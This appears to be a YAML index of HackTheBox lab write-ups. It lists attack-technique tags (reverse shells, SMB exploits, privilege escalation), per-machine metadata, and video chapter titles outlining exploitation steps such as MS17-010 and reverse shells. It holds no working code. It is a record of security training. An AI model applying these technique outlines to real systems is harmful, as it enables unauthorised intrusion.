      exploit_php_fileupload_bypass: 2
      exploit_php_reverseshell: 6
      exploit_php_webshell: 1
      exploit_phptax: 1
      exploit_python_reverseshell: 2
      exploit_shellshock: 1
      exploit_smb_ms08_067: 1
      exploit_smb_ms17_010: 1
      exploit_smb_nullsession: 1
      exploit_smb_usermap: 1
      exploit_smb_web_root: 1
      exploit_sql_login: 1
      exploit_sql_xpcmdshell: 1
      exploit_sqli: 4
      exploit_ssh_authorizedkeys: 2
      exploit_ssh_bruteforce: 1
      exploit_ssh_privatekeys: 1
      exploit_wordpress_defaultcreds: 1
      exploit_wordpress_plugin: 1
      exploit_wordpress_plugin_activitymonitor: 1
      exploit_wordpress_plugin_hellodolly: 2
      exploit_wordpress_template: 1
      privesc_anansi: 1
      privesc_bash_reverseshell: 1
      privesc_bof: 1
      privesc_chkrootkit: 1
      privesc_credsreuse: 1
      privesc_cron: 4
      privesc_cron_rootjobs: 1
      privesc_docker_group: 1
      privesc_env_relative_path: 1
      privesc_freebsd: 1
      privesc_kernel_ipappend: 1
      privesc_kernel_overlayfs: 1
      privesc_lxc_bash: 1
      privesc_modssl: 1
      privesc_mysql_creds: 3
      privesc_mysql_root: 2
      privesc_mysql_udf: 2
      privesc_nfs_norootsquash: 1
      privesc_nmap: 2
      privesc_passwd_writable: 1
      privesc_psexec_login: 1
      privesc_setuid: 6
      privesc_shell_escape: 1
      privesc_ssh_authorizedkeys: 1
      privesc_ssh_knownhosts: 1
      privesc_strace_setuid: 1
      privesc_sudo: 6
      privesc_sudoers: 7
      privesc_windows_ms11_046: 1
      privesc_windows_ms14_070: 1
      privesc_windows_ms15_051: 1
      privesc_windows_ms16_098: 1
  readme:
  - datetime: 20200428
    infra: HackTheBox
    machine:
      difficulty: startingpoint
      difficulty_ratings: null
      id: 287
      infrastructure: hackthebox
      ip: 10.10.10.27
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png
      matrix:
        aggregate: []
        maker: []
      matrixurl: null
      name: Archetype
      order: 1
      os: Windows
      oscplike: false
      owned_root: true
      owned_user: true
      points: 0
      private: false
      ratingsurl: null
      shortname: archetype
      url: https://app.hackthebox.eu/machines/287
      verbose_id: hackthebox#287
      vip: 0
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate:
            - enumerate_proto_smb
            - enumerate_proto_smb_anonymous_access
            - enumerate_proto_sql
            - enumerate_proto_sql_ssis_dtsconfig
            - enumerate_app_powershell_history
            exploit:
            - exploit_sql_login
            - exploit_sql_xpcmdshell
            privesc:
            - privesc_psexec_login
    name: Archetype
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png"
      width="100" height="100" />
    points: null
    status: public
    tags:
    - enumerate_proto_smb
    - enumerate_proto_smb_anonymous_access
    - enumerate_proto_sql
    - enumerate_proto_sql_ssis_dtsconfig
    - exploit_sql_login
    - exploit_sql_xpcmdshell
    - enumerate_app_powershell_history
    - privesc_psexec_login
    url: https://app.hackthebox.eu/machines/287
    writeup: https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf
  - datetime: 20200625
    infra: HackTheBox
    machine:
      difficulty: easy
      difficulty_ratings:
      - 6437
      - 5533
      - 5279
      - 3111
      - 8254
      - 933
      - 650
      - 311
      - 95
      - 156
      free: false
      id: 118
      infrastructure: hackthebox
      ip: 10.10.10.68
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png
      maker:
        id: 2904
        name: Arrexel
      maker2: null
      matrix:
        aggregate:
        - 5.5
        - 4.4
        - 4.3
        - 5.7
        - 5.6
        maker:
        - 0
        - 0
        - 0
        - 0
        - 0
      matrixurl: https://github.com/7h3rAm/writeups/blob/master/htb.bashed/matrix.png
      name: Bashed
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: 20
      private: false
      rating: '4.5'
      ratingsurl: https://github.com/7h3rAm/writeups/blob/master/htb.bashed/ratings.png
      release: '2017-12-09'
      retired: true
      retired_date: '2018-04-28'
      root_owns: 14742
      shortname: bashed
      url: https://app.hackthebox.eu/machines/118
      user_owns: 18103
      verbose_id: hackthebox#118
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate:
            - enumerate_proto_http
            exploit:
            - exploit_python_reverseshell
            privesc:
            - privesc_sudo
            - privesc_cron_rootjobs
    name: Bashed
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - enumerate_proto_http
    - exploit_python_reverseshell
    - privesc_sudo
    - privesc_cron_rootjobs
    url: https://app.hackthebox.eu/machines/118
    writeup: https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf
  - datetime: 20191113
    infra: HackTheBox
    machine:
      difficulty: easy
      difficulty_ratings:
      - 2321
      - 1854
      - 2562
      - 1541
      - 3657
      - 324
      - 193
      - 65
      - 21
      - 47
      free: false
      id: 48
      infrastructure: hackthebox
      ip: 10.10.10.37
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png
      maker:
        id: 2904
        name: Arrexel
      maker2: null
      matrix:
        aggregate:
        - 6.4
        - 5.4
        - 4.1
        - 5.9
        - 4.6
        maker:
        - 0
        - 0
        - 0
        - 0
        - 0
      matrixurl: https://github.com/7h3rAm/writeups/blob/master/htb.blocky/matrix.png
      name: Blocky
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: 20
      private: false
      rating: '4.4'
      ratingsurl: https://github.com/7h3rAm/writeups/blob/master/htb.blocky/ratings.png
      release: '2017-07-21'
      retired: true
      retired_date: '2017-12-09'
      root_owns: 7124
      shortname: blocky
      url: https://app.hackthebox.eu/machines/48
      user_owns: 7116
      verbose_id: hackthebox#48
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf
      writeups:
        ippsec:
          description:
            00:00:01 - ------ Box Completed, Below extra content (Some mistakes, pretty much do this live without prep): https://www.youtube.com/watch?v=C2O-rilXA6I&t=1s
            '00:00:01 - The STTY command I messed up was simply `stty rows ## cols ##`': https://www.youtube.com/watch?v=C2O-rilXA6I&t=1s
            00:01:15 - Begin Recon with Reconnoitre: https://www.youtube.com/watch?v=C2O-rilXA6I&t=75s
            00:03:15 - Examining findings from Reconnoitre: https://www.youtube.com/watch?v=C2O-rilXA6I&t=195s
            00:06:50 - Decompiling java Jar Files with JAD: https://www.youtube.com/watch?v=C2O-rilXA6I&t=410s
            00:08:18 - Using JD-GUI: https://www.youtube.com/watch?v=C2O-rilXA6I&t=498s
            00:10:33 - Running WPScan: https://www.youtube.com/watch?v=C2O-rilXA6I&t=633s
            00:12:10 - Manually enumerating wordpress users: https://www.youtube.com/watch?v=C2O-rilXA6I&t=730s
            00:12:43 - SSH To the box and PrivEsc: https://www.youtube.com/watch?v=C2O-rilXA6I&t=763s
            00:15:30 - Rabbit hole, gaining access through FTP: https://www.youtube.com/watch?v=C2O-rilXA6I&t=930s
            00:17:09 - Finding Wordpress DB Password: https://www.youtube.com/watch?v=C2O-rilXA6I&t=1029s
            00:18:33 - Switching to WWW-DATA by using phpMyAdmin + Wordpress: https://www.youtube.com/watch?v=C2O-rilXA6I&t=1113s
            00:20:10 - Generating a PHP Password for Wordpress: https://www.youtube.com/watch?v=C2O-rilXA6I&t=1210s
            00:21:50 - Gaining code execution with Wordpress Admin access: https://www.youtube.com/watch?v=C2O-rilXA6I&t=1310s
            00:25:40 - Shell as www-data: https://www.youtube.com/watch?v=C2O-rilXA6I&t=1540s
            00:26:40 - Enumerating Kernel Exploits with Linux-Exploit-Suggester: https://www.youtube.com/watch?v=C2O-rilXA6I&t=1600s
            00:30:10 - Attempting CVE-2017-6074 Dccp Kernel Exploit (Unstable AF): https://www.youtube.com/watch?v=C2O-rilXA6I&t=1810s
          name: HackTheBox - Blocky
          video_url: https://www.youtube.com/watch?v=C2O-rilXA6I&t=0
    name: Blocky
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - enumerate_app_wordpress
    - exploit_wordpress_plugin
    - exploit_credsreuse
    - privesc_sudoers
    url: https://app.hackthebox.eu/machines/48
    writeup: https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf
  - datetime: 20191101
    infra: HackTheBox
    machine:
      difficulty: easy
      difficulty_ratings:
      - 16064
      - 7264
      - 3636
      - 1256
      - 6927
      - 213
      - 124
      - 84
      - 29
      - 116
      free: false
      id: 51
      infrastructure: hackthebox
      ip: 10.10.10.40
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png
      maker:
        id: 1
        name: ch4p
      maker2: null
      matrix:
        aggregate:
        - 4
        - 6.2
        - 8.1
        - 1.9
        - 3.8
        maker:
        - 0
        - 0
        - 0
        - 0
        - 0
      matrixurl: https://github.com/7h3rAm/writeups/blob/master/htb.blue/matrix.png
      name: Blue
      os: Windows
      oscplike: true
      owned_root: true
      owned_user: true
      points: 20
      private: false
      rating: '4.6'
      ratingsurl: https://github.com/7h3rAm/writeups/blob/master/htb.blue/ratings.png
      release: '2017-07-28'
      retired: true
      retired_date: '2018-01-13'
      root_owns: 19988
      shortname: blue
      url: https://app.hackthebox.eu/machines/51
      user_owns: 19300
      verbose_id: hackthebox#51
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf
      writeups:
        ippsec:
          description:
            00:00:38 - Start of Recon: https://www.youtube.com/watch?v=YRsfX6DW10E&t=38s
            00:01:20 - Finding NMAP Scripts (Probably a stupid way): https://www.youtube.com/watch?v=YRsfX6DW10E&t=80s
            00:02:00 - Running Safe Scripts - Not -sC, which is default.: https://www.youtube.com/watch?v=YRsfX6DW10E&t=120s
            00:02:52 - Listing NMAP Script Categories (Prob a really stupid way): https://www.youtube.com/watch?v=YRsfX6DW10E&t=172s
            00:03:18 - Really Cool Grep (Only show matching -oP): https://www.youtube.com/watch?v=YRsfX6DW10E&t=198s
            00:04:40 - Nmap Safe Script Output: https://www.youtube.com/watch?v=YRsfX6DW10E&t=280s
            00:06:30 - Exploiting MS17-010 with MSF: https://www.youtube.com/watch?v=YRsfX6DW10E&t=390s
            00:07:40 - Setting up Dev Branch of Empire: https://www.youtube.com/watch?v=YRsfX6DW10E&t=460s
            00:09:07 - Starting a Listener: https://www.youtube.com/watch?v=YRsfX6DW10E&t=547s
            00:10:55 - Getting a PowerShell Oneliner to launch payload: https://www.youtube.com/watch?v=YRsfX6DW10E&t=655s
            00:12:16 - Invoke-Expression (IEX) to Execute Launcher: https://www.youtube.com/watch?v=YRsfX6DW10E&t=736s
            00:13:25 - Interacting with a single agent: https://www.youtube.com/watch?v=YRsfX6DW10E&t=805s
            00:13:40 - Using Modules - PowerUp Invoke-AllChecks: https://www.youtube.com/watch?v=YRsfX6DW10E&t=820s
            00:14:40 - Fixing weird issue with PS Module: https://www.youtube.com/watch?v=YRsfX6DW10E&t=880s
            00:16:15 - Invoke-AllChecks finished: https://www.youtube.com/watch?v=YRsfX6DW10E&t=975s
            00:17:15 - Loading PS Modules into Memory: https://www.youtube.com/watch?v=YRsfX6DW10E&t=1035s
            00:17:40 - Executing funcitons out of above module: https://www.youtube.com/watch?v=YRsfX6DW10E&t=1060s
            00:18:20 - Why I don't pass to MSF via InjectShellcode: https://www.youtube.com/watch?v=YRsfX6DW10E&t=1100s
            00:22:45 - How I pass from Empire to MSF (Unicorn + IEX): https://www.youtube.com/watch?v=YRsfX6DW10E&t=1365s
            00:25:53 - Just running Powershell CMDs from Empire (Shell): https://www.youtube.com/watch?v=YRsfX6DW10E&t=1553s
          name: HackTheBox - Blue
          video_url: https://www.youtube.com/watch?v=YRsfX6DW10E&t=0
    name: Blue
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_smb_ms17_010
    url: https://app.hackthebox.eu/machines/51
    writeup: https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf
  - datetime: 20200722
    infra: HackTheBox
    machine:
      difficulty: easy
      difficulty_ratings:
      - 2776
      - 3111
      - 3955
      - 2482
      - 5994
      - 983
      - 818
      - 439
      - 122
      - 212
      free: false
      id: 263
      infrastructure: hackthebox
      ip: 10.10.10.198
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png
      maker:
        id: 94858
        name: egotisticalSW
      maker2: null
      matrix:
        aggregate:
        - 5.5
        - 5.6
        - 7.7
        - 2.3
        - 4.4
        maker:
        - 6
        - 7
        - 9
        - 1
        - 3
      matrixurl: https://github.com/7h3rAm/writeups/blob/master/htb.buff/matrix.png
      name: Buff
      os: Windows
      oscplike: true
      owned_root: true
      owned_user: true
      points: 20
      private: false
      rating: '3.6'
      ratingsurl: https://github.com/7h3rAm/writeups/blob/master/htb.buff/ratings.png
      release: '2020-07-18'
      retired: true
      retired_date: '2020-11-21'
      root_owns: 6470
      shortname: buff
      url: https://app.hackthebox.eu/machines/263
      user_owns: 15667
      verbose_id: hackthebox#263
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf
      writeups:
        ippsec:
          description:
            00:00:00 - Introduction: https://www.youtube.com/watch?v=-KBm3tBNK74&t=0s
            00:00:45 - Begin of nmap and poking at the website: https://www.youtube.com/watch?v=-KBm3tBNK74&t=45s
            00:03:00 - Checking when an image was uploaded to the server with wget and exiftool: https://www.youtube.com/watch?v=-KBm3tBNK74&t=180s
            00:04:10 - Contact.php discloses the software Gym Management Software is being used. Examining the exploit: https://www.youtube.com/watch?v=-KBm3tBNK74&t=250s
            00:06:10 - Editing the Python Exploit to force everything through a proxy, so we can examine what the exploit does.: https://www.youtube.com/watch?v=-KBm3tBNK74&t=370s
            00:08:30 - Running the exploit and examining in Burp: https://www.youtube.com/watch?v=-KBm3tBNK74&t=510s
            00:14:20 - Having trouble getting a reverse shell via PS, Uploading NC.EXE to do it: https://www.youtube.com/watch?v=-KBm3tBNK74&t=860s
            '00:17:10 - Running WinPEAS.exe ': https://www.youtube.com/watch?v=-KBm3tBNK74&t=1030s
            00:21:00 - Discovering CloudMe in the Downloads directory then looking at the exploit: https://www.youtube.com/watch?v=-KBm3tBNK74&t=1260s
            00:23:20 - CloudMe isn't listening on a port... Reverting and getting a shell again: https://www.youtube.com/watch?v=-KBm3tBNK74&t=1400s
            00:25:30 - Reverse shell returned... Still waiting for CloudMe to listen on a port: https://www.youtube.com/watch?v=-KBm3tBNK74&t=1530s
            00:27:27 - Uploading Chisel to the box, then doing a port forward for MySQL to enumerate the database: https://www.youtube.com/watch?v=-KBm3tBNK74&t=1647s
            00:31:00 - Finding MySQL Credentials in db.php, then checking the database from our box thanks to Chisel: https://www.youtube.com/watch?v=-KBm3tBNK74&t=1860s
            00:34:30 - Replacing the payload in the CloudMe exploit with a reverse shell: https://www.youtube.com/watch?v=-KBm3tBNK74&t=2070s
            00:37:20 - Running the exploit and getting root: https://www.youtube.com/watch?v=-KBm3tBNK74&t=2240s
          name: HackTheBox - Buff
          video_url: https://www.youtube.com/watch?v=-KBm3tBNK74&t=0
    name: Buff
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - enumerate_proto_http
    - exploit_gymsystem_rce
    - exploit_cloudme_bof
    url: https://app.hackthebox.eu/machines/263
    writeup: https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf
  - datetime: 20191113
    infra: HackTheBox
    machine:
      difficulty: medium
      difficulty_ratings:
      - 551
      - 1040
      - 2263
      - 1956
      - 4130
      - 616
      - 387
      - 168
      - 46
      - 49
      free: false
      id: 11
      infrastructure: hackthebox
      ip: 10.10.10.13
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png
      maker:
        id: 1
        name: ch4p
      maker2: null
      matrix:
        aggregate:
        - 6.9
        - 6.6
        - 5.3
        - 4.7
        - 3.4
        maker:
        - 0
        - 0
        - 0
        - 0
        - 0
      matrixurl: https://github.com/7h3rAm/writeups/blob/master/htb.cronos/matrix.png
      name: Cronos
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: 30
      private: false
      rating: '4.4'
      ratingsurl: https://github.com/7h3rAm/writeups/blob/master/htb.cronos/ratings.png
      release: '2017-03-22'
      retired: true
      retired_date: '2017-05-26'
      root_owns: 5704
      shortname: cronos
      url: https://app.hackthebox.eu/machines/11
      user_owns: 6219
      verbose_id: hackthebox#11
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_sqli
            privesc:
            - privesc_cron
    name: CronOS
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png"
      width="100" height="100" />
    points: 30
    status: public
    tags:
    - exploit_sqli
    - privesc_cron
    url: https://app.hackthebox.eu/machines/11
    writeup: https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf
  - datetime: 20191105
    infra: HackTheBox
    machine:
      difficulty: easy
      difficulty_ratings:
      - 2870
      - 5284
      - 7883
      - 4601
      - 9086
      - 916
      - 603
      - 287
      - 71
      - 120
      free: false
      id: 3
      infrastructure: hackthebox
      ip: 10.10.10.5
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png
      maker:
        id: 1
        name: ch4p
      maker2: null
      matrix:
        aggregate:
        - 4.4
        - 5.1
        - 6.7
        - 3.3
        - 4.9
        maker:
        - 0
        - 0
        - 0
        - 0
        - 0
      matrixurl: https://github.com/7h3rAm/writeups/blob/master/htb.devel/matrix.png
      name: Devel
      os: Windows
      oscplike: true
      owned_root: true
      owned_user: true
      points: 20
      private: false
      rating: '4.2'
      ratingsurl: https://github.com/7h3rAm/writeups/blob/master/htb.devel/ratings.png
      release: '2017-03-15'
      retired: true
      retired_date: '2017-10-14'
      root_owns: 18229
      shortname: devel
      url: https://app.hackthebox.eu/machines/3
      user_owns: 17382
      verbose_id: hackthebox#3
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf
      writeups:
        ippsec:
          description:
            00:01:02 - Going over NMAP: https://www.youtube.com/watch?v=2LNyAbroZUk&t=62s
            00:02:00 - Anonymous FTP + File Upload: https://www.youtube.com/watch?v=2LNyAbroZUk&t=120s
            '00:04:30 - MSFVenom ': https://www.youtube.com/watch?v=2LNyAbroZUk&t=270s
            00:07:20 - Metasploit: https://www.youtube.com/watch?v=2LNyAbroZUk&t=440s
            00:10:00 - Exploit Suggestor: https://www.youtube.com/watch?v=2LNyAbroZUk&t=600s
            00:11:30 - Getting Root: https://www.youtube.com/watch?v=2LNyAbroZUk&t=690s
          name: HackTheBox - Devel
          video_url: https://www.youtube.com/watch?v=2LNyAbroZUk&t=0
    name: Devel
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_ftp_anonymous
    - exploit_ftp_web_root
    - exploit_iis_asp_reverseshell
    - privesc_windows_ms11_046
    url: https://app.hackthebox.eu/machines/3
    writeup: https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf
  - datetime: 20191104
    infra: HackTheBox
    machine:
      difficulty: easy
      difficulty_ratings:
      - 1960
      - 3459
      - 4102
      - 2291
      - 4405
      - 419
      - 240
      - 129
      - 35
      - 78
      free: false
      id: 13
      infrastructure: hackthebox
      ip: 10.10.10.14
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png
      maker:
        id: 1
        name: ch4p
      maker2: null
      matrix:
        aggregate:
        - 4.2
        - 5
        - 7.4
        - 2.6
        - 5
        maker:
        - 0
        - 0
        - 0
        - 0
        - 0
      matrixurl: https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/matrix.png
      name: Grandpa
      os: Windows
      oscplike: true
      owned_root: true
      owned_user: true
      points: 20
      private: false
      rating: '3.7'
      ratingsurl: https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/ratings.png
      release: '2017-04-12'
      retired: true
      retired_date: '2017-10-21'
      root_owns: 9711
      shortname: grandpa
      url: https://app.hackthebox.eu/machines/13
      user_owns: 9407
      verbose_id: hackthebox#13
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf
      writeups:
        ippsec:
          description:
            ? '00:00:01 - Heads up. The pivot idea, was a pretty big fail. Should
              of prep''d more but was short on time. Enjoy watching me struggle, if
              you wanted to see the pivot stuff working I uploaded an updated video
              here: https://youtu.be/HQkDL-xh7es'
            : https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=1s
            00:01:50 - Nmap Results (Discovery of WebDav): https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=110s
            00:04:35 - DavTest: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=275s
            00:06:22 - HTTP PUT Upload Files: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=382s
            00:07:00 - MSFVenom Generate aspx payload: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=420s
            00:13:00 - User Shell Returned: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=780s
            00:16:23 - Get Admin Shell (ms14-070): https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=983s
            00:17:14 - Beginning of Pivot Fail. Socks Proxy: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=1034s
            00:29:35 - Shell on Grandpa (CVE-2017-7269): https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=1775s
            00:32:45 - Using portfwd to access ports not exposed to routable interfaces: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=1965s
            00:34:45 - Cracking LM Hash Explanation: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=2085s
            00:38:30 - Cracking LM Hashes via Hashcat: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=2310s
            '00:41:30 - Grandpa acts cranky. Revert. ': https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=2490s
            00:42:30 - Expected behavior when exploiting via CVE-2017-7269. None of that auto system weirdness (45:20 gets admin): https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=2550s
            00:45:50 - Using Hashcat to crack NTLM using LM Hashes: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=2750s
            00:48:50 - Finally log into SMB using the portfwd from 32:45: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=2930s
            00:49:07 - Random pivot attempt failure.: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=2947s
          name: HackTheBox - Granny and Grandpa
          video_url: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=0
    name: Grandpa
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_iis_webdav
    - privesc_windows_ms14_070
    url: https://app.hackthebox.eu/machines/13
    writeup: https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf
  - datetime: 20191104
    infra: HackTheBox
    machine:
      difficulty: easy
      difficulty_ratings:
      - 2626
      - 3163
      - 3621
      - 1769
      - 3792
      - 288
      - 171
      - 85
      - 29
      - 60
      free: false
      id: 14
      infrastructure: hackthebox
      ip: 10.10.10.15
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png
      maker:
        id: 1
        name: ch4p
      maker2: null
      matrix:
        aggregate:
        - 4.2
        - 5
        - 7.5
        - 2.5
        - 5
        maker:
        - 0
        - 0
        - 0
        - 0
        - 0
      matrixurl: https://github.com/7h3rAm/writeups/blob/master/htb.granny/matrix.png
      name: Granny
      os: Windows
      oscplike: true
      owned_root: true
      owned_user: true
      points: 20
      private: false
      rating: '3.2'
      ratingsurl: https://github.com/7h3rAm/writeups/blob/master/htb.granny/ratings.png
      release: '2017-04-12'
      retired: true
      retired_date: '2017-05-26'
      root_owns: 8657
      shortname: granny
      url: https://app.hackthebox.eu/machines/14
      user_owns: 8324
      verbose_id: hackthebox#14
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf
      writeups:
        ippsec:
          description:
            ? '00:00:01 - Heads up. The pivot idea, was a pretty big fail. Should
              of prep''d more but was short on time. Enjoy watching me struggle, if
              you wanted to see the pivot stuff working I uploaded an updated video
              here: https://youtu.be/HQkDL-xh7es'
            : https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=1s
            00:01:50 - Nmap Results (Discovery of WebDav): https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=110s
            00:04:35 - DavTest: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=275s
            00:06:22 - HTTP PUT Upload Files: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=382s
            00:07:00 - MSFVenom Generate aspx payload: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=420s
            00:13:00 - User Shell Returned: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=780s
            00:16:23 - Get Admin Shell (ms14-070): https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=983s
            00:17:14 - Beginning of Pivot Fail. Socks Proxy: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=1034s
            00:29:35 - Shell on Grandpa (CVE-2017-7269): https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=1775s
            00:32:45 - Using portfwd to access ports not exposed to routable interfaces: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=1965s
            00:34:45 - Cracking LM Hash Explanation: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=2085s
            00:38:30 - Cracking LM Hashes via Hashcat: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=2310s
            '00:41:30 - Grandpa acts cranky. Revert. ': https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=2490s
            00:42:30 - Expected behavior when exploiting via CVE-2017-7269. None of that auto system weirdness (45:20 gets admin): https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=2550s
            00:45:50 - Using Hashcat to crack NTLM using LM Hashes: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=2750s
            00:48:50 - Finally log into SMB using the portfwd from 32:45: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=2930s
            00:49:07 - Random pivot attempt failure.: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=2947s
          name: HackTheBox - Granny and Grandpa
          video_url: https://www.youtube.com/watch?v=ZfPVGJGkORQ&t=0
    name: Granny
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_iis_webdav
    - privesc_windows_ms15_051
    url: https://app.hackthebox.eu/machines/14
    writeup: https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf
  - datetime: 20191101
    infra: HackTheBox
    machine:
      difficulty: easy
      difficulty_ratings:
      - 16657
      - 11116
      - 6255
      - 2056
      - 9715
      - 372
      - 222
      - 145
      - 64
      - 155
      free: false
      id: 1
      infrastructure: hackthebox
      ip: 10.10.10.3
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png
      maker:
        id: 1
        name: ch4p
      maker2: null
      matrix:
        aggregate:
        - 4.3
        - 4.3
        - 7.1
        - 2.9
        - 5.7
        maker:
        - 0
        - 0
        - 0
        - 0
        - 0
      matrixurl: https://github.com/7h3rAm/writeups/blob/master/htb.lame/matrix.png
      name: Lame
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: 20
      private: false
      rating: '4.4'
      ratingsurl: https://github.com/7h3rAm/writeups/blob/master/htb.lame/ratings.png
      release: '2017-03-14'
      retired: true
      retired_date: '2017-05-26'
      root_owns: 26773
      shortname: lame
      url: https://app.hackthebox.eu/machines/1
      user_owns: 25025
      verbose_id: hackthebox#1
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_smb_usermap
            privesc: []
    name: Lame
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_smb_usermap
    url: https://app.hackthebox.eu/machines/1
